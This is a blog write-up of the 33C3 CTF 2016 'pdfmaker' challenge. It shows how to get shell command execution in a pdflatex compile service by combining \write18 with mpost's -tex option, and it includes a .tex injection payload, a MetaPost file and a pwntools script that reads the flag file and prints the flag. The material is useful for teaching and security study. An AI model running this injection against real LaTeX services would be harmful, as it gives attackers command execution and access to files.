Home 33C3 CTF 2016 -- pdfmaker
Post
Cancel

33C3 CTF 2016 -- pdfmaker

Category: Misc
Points: 75

Just a tiny application, that lets the user write some files and compile them with pdflatex.

What can possibly go wrong?

nc 78.46.224.91 24242

So this is a service that allow us to create, show & compile some files.

  • create: Create a file. Valid file format are: .log, .tex, .mb, .sty & .bib
  • show: Show the file content.
  • compile: Compile a file with the pdflatex command.

We started by googling the key word “pdflatex exploit”, then teammate mike found a useful link: Pwning coworkers thanks to LaTeX

Basically we just need to follow the method mentioned in the post:

  1. Create a .mp file
  2. Create a .tex file with the malicious content. Here we change the command to (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log, which will later store the flag content into qqq.log
  3. Compile the .tex file. This will cause pdflatext execute our command
  4. Show the qqq.log file and get the flag

Here’s our final exploit:

sss.mp:

1
2
3
4
verbatimtex
\documentclass{minimal}\begin{document}
etex beginfig (1) label(btex blah etex, origin);
endfig; \end{document} bye

aaa.tex:

1
2
3
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (cat${IFS}$(ls|grep${IFS}33C3))>qqq.log" "sss.mp"}
\end{document}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
from pwn import *

r = remote("78.46.224.91", 24242)

log.info("creating sss.mp...")
r.sendlineafter(">", "create mp sss")
r.recvline()
f = open("sss.mp", "r")
for line in f:
    r.sendline(line.strip())
r.sendline("\q")
f.close()

log.info("creating aaa.tex...")
r.sendlineafter(">", "create tex aaa")
r.recvline()
f = open("aaa.tex", "r")
for line in f:
    r.sendline(line.strip())
r.sendline("\q")
f.close()

r.sendlineafter(">", "compile aaa")
r.sendlineafter(">", "show log qqq")

r.interactive()

Don’t take LaTEX files from strangers!!

flag: 33C3_pdflatex_1s_t0t4lly_s3cur3!

This post is licensed under CC BY-SA 4.0 by the author.

SECCON CTF 2016 -- chat

33C3 CTF 2016 -- The 0x90s called

Comments powered by Disqus.